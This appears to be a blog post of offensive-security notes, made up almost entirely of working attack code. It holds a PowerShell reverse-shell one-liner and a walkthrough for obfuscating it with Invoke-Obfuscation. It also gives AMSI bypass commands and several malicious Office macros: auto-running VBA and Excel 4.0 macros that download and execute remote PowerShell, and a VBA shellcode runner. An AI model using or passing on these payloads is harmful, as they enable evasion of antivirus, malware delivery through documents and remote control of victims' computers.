Obfuscate the Powershell code
#Powershell one-Liner
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.133',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#save the above rev-shell to a file; rev.txt
#Download Invoke-Obfuscation
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
Output:
Choose one of the below options:
[*] TOKEN Obfuscate PowerShell command Tokens
[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING Obfuscate entire command as a String
[*] ENCODING Obfuscate entire command via Encoding
[*] COMPRESS Convert entire command to one-liner and Compress
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> token
Choose one of the below Token options:
[*] TOKEN\STRING Obfuscate String tokens (suggested to run first)
[*] TOKEN\COMMAND Obfuscate Command tokens
[*] TOKEN\ARGUMENT Obfuscate Argument tokens
[*] TOKEN\MEMBER Obfuscate Member tokens
[*] TOKEN\VARIABLE Obfuscate Variable tokens
[*] TOKEN\TYPE Obfuscate Type tokens
[*] TOKEN\COMMENT Remove all Comment tokens
[*] TOKEN\WHITESPACE Insert random Whitespace (suggested to run last)
[*] TOKEN\ALL Select All choices from above (random order)
Invoke-Obfuscation\Token> All
Choose one of the below Token\All options to APPLY to current payload:
[*] TOKEN\ALL\1 Execute ALL Token obfuscation techniques (random order)
Invoke-Obfuscation\Token\All> SET SCRIPTPATH ./rev.txt
Successfully set ScriptPath:
./rev.txt
Choose one of the below Token\All options to APPLY to current payload:
[*] TOKEN\ALL\1 Execute ALL Token obfuscation techniques (random order)
Invoke-Obfuscation\Token\All> 1
[*] Obfuscating 3 String tokens.
[*] Obfuscating 11 Member tokens.
[*] Obfuscating 2 Type tokens.
[*] Obfuscating 23 Variable tokens.
[*] Obfuscating 2 Argument tokens.
[*] Obfuscating 7 Command tokens.
Executed:
CLI: Token\All\1
FULL: Out-ObfuscatedTokenCommand -ScriptBlock $ScriptBlock
save the output to a file
AMSI Bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
[Ref].Assembly.GetType(“System.Management.Automation.AmsiUti”+“ls”).GetField(“amsiInitF”+“ailed”,‘NonPublic,Static’).SetValue($null,$true)
Method-1
Private Sub Workbook_Open()
Shell ("p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e I" & "E" & "X ((" & "n" & "e" & "w-o" & "bj" & "ect net.we" & "bcli" & "ent).d" & "ownl" & "oa" & "ds" & "tring('http://10.10.10.10/obf.ps1'))")
End Sub
Method - II
use VBA reverse shell
Method - III
#Download powershell script and run it via VBA
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/run.ps1') | IEX"
Shell str, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Method - IV
#VBA Shellcode Runner
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
buf = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Method -V
#Open a excel sheet
#right click on the sheet --> Select Macro 4.0 --> new macro sheet is created
#rename A1 to auto_open
#and add the below command in A1
=EXEC("powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/obf.ps1')")
Method - VI
use Spoofing Office Macro
Comments
Post a Comment